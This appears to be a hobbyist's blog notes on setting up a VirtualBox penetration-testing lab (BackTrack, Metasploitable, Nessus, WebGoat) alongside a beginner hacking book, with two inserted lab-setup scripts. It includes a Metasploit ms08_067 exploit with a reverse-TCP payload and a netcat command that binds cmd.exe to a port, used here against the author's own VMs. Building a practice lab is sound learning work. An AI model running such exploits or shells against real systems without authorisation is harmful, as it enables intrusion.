I've been working my way through a book on hacking and penetration testing:
The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)
Overall, it is a good read, and great for beginners like me. One shortcoming is that it doesn't tell you how to set up a hacking lab on your computer. That is, how to set up different operating systems running on virtual machines (like virtualbox), as an alternative to networking multiple physical machines. I struggled a bit to set up a hacking lab, so I thought I would post my notes here.
Steps:
1. Download Virtualbox (https://www.virtualbox.org/) for whatever operating system you are using. I started off using a Mac running Snow Leopard, but my Mac is old and can't handle much, so I switched to a PC running Windows 7 with 8 GB RAM (64-bit machine), which I have available.
2. Download Backtrack Linux (http://www.backtrack-linux.org) and make sure you follow the instructions at these two pages: http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install and http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk
One modification: AFTER installing backtrack but BEFORE installing virtualbox guest additions, do the following:
apt-get update
apt-get upgrade
apt-get install dkms
3. Download a couple of operating systems to use as targets to practice on (this is what is recommended in the book). Here are some options:
- Windows XP, preferably with no service pack, or SP1. If you can only get SP2 or SP3, then fine.
- Metasploitable (http://www.offensive-security.com/metasploit-unleashed/Metasploitable). This is the link to the torrent file.
- Anything else you want to try. Windows 7 maybe? An older version of Ubuntu?
4. Set up the "guest" virtual machines for these other operating systems similar to the way you installed Backtrack Linux and according to the documentation for Virtualbox. BUT, you should make one change to the default settings that the book and the above resources (except the Virtualbox documentation) do not mention: for EACH guest machine, under "Settings" -> "Network", in the "Attached to:" field, select "Bridged Adapter" from the drop-down menu (instead of the default NAT). Then go ahead and start your guest machines.
This will allow your machines to ping, nmap, etc. each other (note that if the Windows XP firewall is enabled, then it won't reply to pings, nmap, etc.).
Installing Win XP in a guest machine was pretty easy. The same is true for Metasploitable - once you know what to do, which is the following (after you have unzipped the metasploitable.zip file):
1. In the Virtualbox Manager (I'm using 4.1.16 r78094), click "New" then "Next"
2. Enter a name for the virtual machine, e.g. metasploit
3. Select the amount of memory, e.g. 512 MB and click next
4. Leave Startup Disk checked, and select "Use Existing Hard Disk". Click the folder and navigate to the Metasploitable.vmdk file
5. Click Open, then Create.
Don't forget to change the Video memory to 64 MB (or 128 MB), and change the Network to Bridged Adapter.
Also, the login credentials for Metasploitable are user: msfadmin, and password: msfadmin.
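The same guest set-up from the command line, as an added example that is not part of the original notes: it creates the Metasploitable VM with the values listed in steps 1 to 5 (512 MB RAM, the existing Metasploitable.vmdk, 64 MB video memory) and then attaches every lab guest to a VirtualBox internal network rather than a bridged adapter. A bridged adapter puts the guests on the physical LAN, which for targets with known holes and default logins (msfadmin/msfadmin) means anyone on that LAN can reach them; an internal network keeps them reachable only from the other guests, which is all the ping/nmap practice above needs. The VM names, the network name and the path of the .vmdk are assumptions; the VBoxManage subcommands are VirtualBox's own.

```shell
#!/bin/sh
# Added example, not from the post: build the Metasploitable guest with the
# settings given in the notes and put all lab guests on one isolated
# VirtualBox internal network instead of a bridged adapter.
# VM names, network name and vmdk path below are assumptions.

LAB_NET="pentestlab"                    # assumed internal network name
LAB_VMS="backtrack winxp metasploit"    # assumed VM names
VMDK="$HOME/Metasploitable.vmdk"        # assumed location of the unzipped disk

# Steps 1-5 of the notes as VBoxManage calls (run on the host).
create_metasploitable() {
    VBoxManage createvm --name metasploit --ostype Ubuntu --register
    VBoxManage modifyvm metasploit --memory 512 --vram 64
    VBoxManage storagectl metasploit --name "IDE Controller" --add ide
    VBoxManage storageattach metasploit --storagectl "IDE Controller" \
        --port 0 --device 0 --type hdd --medium "$VMDK"
}

# Attach NIC 1 of a powered-off VM to the internal lab network.
isolate_vm() {
    VBoxManage modifyvm "$1" --nic1 intnet --intnet1 "$LAB_NET"
}

# Read "VBoxManage showvminfo <vm> --machinereadable" output on stdin.
# Returns 0 if nic1 is an internal network named $LAB_NET,
#         1 if it is an internal network with some other name,
#         2 if it is anything else (nat, bridged, hostonly, ...).
check_isolated() {
    info=$(cat)
    mode=$(printf '%s\n' "$info" | sed -n 's/^nic1="\(.*\)"$/\1/p')
    net=$(printf '%s\n' "$info" | sed -n 's/^intnet1="\(.*\)"$/\1/p')
    [ "$mode" = "intnet" ] || return 2
    [ "$net" = "$LAB_NET" ] || return 1
    return 0
}

# Isolate every lab VM and verify the result from VirtualBox's own view of it.
isolate_lab() {
    for vm in $LAB_VMS; do
        isolate_vm "$vm" || return 1
        if VBoxManage showvminfo "$vm" --machinereadable | check_isolated; then
            echo "$vm: nic1 on internal network $LAB_NET"
        else
            echo "$vm: nic1 is NOT on $LAB_NET" >&2
            return 1
        fi
    done
}

case "${1:-}" in
    create)  create_metasploitable ;;
    isolate) isolate_lab ;;
    *)       echo "usage: $0 create|isolate" >&2 ;;
esac
```

Run it as `sh lab.sh create` once and `sh lab.sh isolate` with the guests powered off (VirtualBox will not change the NIC type of a running VM through modifyvm; use `VBoxManage controlvm <vm> nic1 intnet <name>` for that). An internal network has no DHCP server unless you add one with `VBoxManage dhcpserver add`, so either do that or give each guest a static address.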
UPDATE 1: There is a typo on page 34 of the book. "set type 5 mx" should instead be "set type = mx"
UPDATE 2: Getting Nessus to work on Firefox running on Backtrack Linux 5 R2 was a pain - the official instructions at the backtrack wiki actually do not work for x64 - but I eventually got it working (for 32 bit, even on a 64 bit machine with BT 64 bit). Here is how (thanks to the backtrack wiki and this post). First follow the instructions at the backtrack wiki page with instructions to install flash player ONLY TO REMOVE the existing flash installation on backtrack (if there is any). Don't do the rest yet:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla
root@bt:~# rm -f /usr/lib/firefox/plugins/*flash*
root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*
root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*
root@bt:~# rm -f ~/.mozilla/plugins/*flash*so
root@bt:~# rm -rfd /usr/lib/nspluginwrapper
These instructions are fine. Now SKIP the part about installing for x64. Next, use the following commands to get the flash player and install the plug-in:
wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz
tar xvzf install_flash_player_11_linux.i386.tar.gz
mkdir ~/.mozilla/plugins
mv libflashplayer.so ~/.mozilla/plugins/
UPDATE 2a: now install nessus:
apt-get install nessus
You can add a user now (by typing /opt/nessus/sbin/nessus-adduser at the prompt) or later. Now register for an activation code at: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code
You will receive an activation code by email. Let's call this @activation_code@. Once you get it, run the following command (replacing @activation_code@ with your activation code - yes, replace the @ symbols too):
/opt/nessus/bin/nessus-fetch --register @activation_code@
UPDATE 3: To log into nessus, you will need to create a user account on nessus. To do so, open up the console and enter the following command:
/opt/nessus/sbin/nessus-adduser
UPDATE 3a: To start nessus, you must type at the command prompt:
/opt/nessus/sbin/nessus-service -D
After Nessus processes the plug-ins, it should be ready to start. Note that we are using the 32-bit version (I don't know why the 64-bit version doesn't work). Now you should be able to start Firefox, navigate to Nessus (https://127.0.0.1:8834) and see a login screen.
UPDATE 4: On page 72 of the book, you are instructed to launch Metasploit using the following command:
/pentest/exploits/framework3/msfconsole
On backtrack linux R2 64 bit, this won't work. Instead you might use:
/pentest/exploits/framework2/msfconsole
This will launch Metasploit, but there is another problem. On page 74 of the book, you are instructed to use the "search" command in Metasploit. It won't work - the search command is not supported. Instead, you need to update Metasploit. From the terminal, type:
msfupdate
(but FIRST, you might want to follow this advice at this link: update Metasploit on Backtrack Linux R2). This will take some time. After it is done, launch Metasploit:
msfconsole
And at the "msf > " prompt, check to see that you have the latest version:
msf > version
(just type version at the prompt). Now you should be able to use the search command in Metasploit.
UPDATE 5: After following some instructions from the book, you'll start an exploit using the "exploit" command at the msf prompt. For example, I am practicing attacking a VirtualBox running Windows XP SP2, so after launching msfconsole, I did the following at the msf > prompt:
use exploit/windows/smb/ms08_067_ntapi
set payload windows/vncinject/reverse_tcp
set RHOST 192..... (victim machine, i.e. the Win XP SP2 machine's IP address)
set LHOST 192..... (attacker, i.e. the Backtrack Linux machine's IP address)
exploit
Now you have access to the victim machine. But in your terminal, there is no prompt. Just go to the terminal and hit enter and you will get your msf > prompt back. There are no instructions in the book on how to stop the exploit, so I just type quit at the prompt and then relaunch msfconsole - that seems to do the trick.
UPDATE 6: I'm trying to use Autopwn automation on Fast-track Web in Backtrack. When I select Autopwn automation from the web browser, the browser displays only HTML instead of a menu. I thought that the problem was with Java not being installed in Firefox, so I followed these instructions to install/update the Java plugin in Firefox. That didn't solve the problem. Then I came across this post which states that autopwn won't work after updating Metasploit, because the update removes the db_autopwn file. So I followed those instructions and downloaded a new db_autopwn file from the link that is available here, placed it in /opt/metasploit/msf3/plugins, and then edited autopwn.py (you can find the directory using the command find / -name autopwn.py). I rebooted BT5 and still it didn't fix the issue. I then updated Fast Track by loading the Fast Track Interactive application from the kstart dragon and selecting update (1 on the menu). I even updated Firefox to the latest version. Still, Autopwn Automation doesn't work on the web GUI. I'll give up for now and just use Fast Track Interactive.
UPDATE 7: Ok, forget Firefox. Autopwn Automation works fine if you access it using Konqueror.
UPDATE 8: In case you want to transfer files between the host and the guest, you can do the following: on the host machine, click "Devices" -> "Shared Folders" -> "Transient Folders" -> click the green "Add Shared Folders (ins)" icon -> in Folder Path click the down arrow, select "Other" and browse to the folder you want to share, then click "OK". Then in a Terminal in the guest, you can type:
mount -t vboxsf name_of_the_folder_you_shared /mnt
name_of_the_folder_you_shared is the name of the folder that you shared, as it appears under "Transient Folders" in the Shared Folders section of the Settings box. (The command I used is:
mount -t vboxsf shareme /mnt
because I shared a folder called "shareme".)
That folder will now appear in the /mnt directory.
UPDATE 9: Getting Webgoat running on BackTrack Linux was a huge pain. This link helped, and so did this link. Here is what I did:
1. Open up a terminal, and update everything in sight:
apt-get update
apt-get upgrade
2. If you don't have the Java stuff installed, then install it. While you're at it, install p7zip:
apt-get install p7zip
apt-get install openjdk-6-jre openjdk-6-jdk
3. Extract the files, then move them, and make the .sh file executable:
p7zip -d OWASP_Standard WebGoat-5.3_RC1.7z
mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat/
chmod +x /pentest/web/webgoat/webgoat.sh
4. At this point, you need to rename a file:
cd /pentest/web/webgoat/tomcat/webapps
mv webgoat.war WebGoat.war
cd /pentest/web/webgoat
(note that you need to be in the /pentest/web/webgoat directory for webgoat to run properly; this is because of the way the paths are defined in the webgoat.sh file)
5. Now start webgoat:
/pentest/web/webgoat/webgoat.sh start80 (or start8080)
6. Open up a browser and go to: http://127.0.0.1/WebGoat/attack (or http://127.0.0.1:8080/WebGoat/attack) and log in with:
user: guest
password: guest
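Steps 4 to 6 above, folded into one script as an added example that is not from the notes or from the WebGoat project. It keeps the two details the notes call out: Tomcat derives the context path from the .war file name, so the file must be WebGoat.war for /WebGoat/attack to exist, and webgoat.sh must be started from its own directory. Instead of opening the browser it polls the lesson URL until Tomcat answers. The paths and ports are the ones used above; the 60-second timeout and the use of curl for the readiness check are assumptions.

```shell
#!/bin/sh
# Added example, not from the post: bring up WebGoat 5.3 RC1 under
# /pentest/web/webgoat with the file-name and working-directory checks
# that the notes above describe. Timeout and curl usage are assumptions.

WEBGOAT_DIR=/pentest/web/webgoat
PORT=${PORT:-8080}        # 80 or 8080, matching "start80" / "start8080"

# Tomcat maps WebGoat.war to /WebGoat; a lower-case webgoat.war would be
# served as /webgoat and the URL in the notes would 404. Succeeds only if
# the correctly named file exists afterwards.
fix_war_name() {    # $1 = tomcat webapps directory
    if [ -f "$1/webgoat.war" ] && [ ! -f "$1/WebGoat.war" ]; then
        mv "$1/webgoat.war" "$1/WebGoat.war"
    fi
    [ -f "$1/WebGoat.war" ]
}

# The lesson URL for a given port (port 80 is left out of the URL).
webgoat_url() {     # $1 = port
    if [ "$1" = "80" ]; then
        echo "http://127.0.0.1/WebGoat/attack"
    else
        echo "http://127.0.0.1:$1/WebGoat/attack"
    fi
}

# webgoat.sh uses paths relative to its own directory, so cd there first.
start_webgoat() {   # $1 = port
    cd "$WEBGOAT_DIR" || return 1
    ./webgoat.sh "start$1"
}

# Poll until Tomcat answers on the lesson URL. Any HTTP reply (including the
# 401 that asks for guest/guest) counts; "connection refused" does not.
wait_for_webgoat() {    # $1 = url, $2 = timeout in seconds
    n=0
    until curl -s -o /dev/null "$1"; do
        n=$((n + 1))
        [ "$n" -ge "$2" ] && return 1
        sleep 1
    done
    return 0
}

case "${1:-}" in
    run)
        fix_war_name "$WEBGOAT_DIR/tomcat/webapps" || { echo "WebGoat.war not found" >&2; exit 1; }
        start_webgoat "$PORT" || exit 1
        url=$(webgoat_url "$PORT")
        wait_for_webgoat "$url" 60 || { echo "WebGoat did not start within 60s" >&2; exit 1; }
        echo "WebGoat ready at $url (login guest/guest)"
        ;;
    *)  echo "usage: PORT=80|8080 $0 run" >&2 ;;
esac
```

Run it as `PORT=8080 sh webgoat-up.sh run` (or `PORT=80`). WebGoat accepts guest/guest and is built to be broken, so keep the guest it runs in on the isolated lab network rather than a bridged adapter.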
UPDATE 10: There is a mistake on page 133, in the section on using Netcat:
meterpreter > nc -L -p 5777 -e cmd.exe
should be instead:
meterpreter > execute -f "nc.exe -L -p 5777 -e cmd.exe"
More hints and advice to come, hopefully.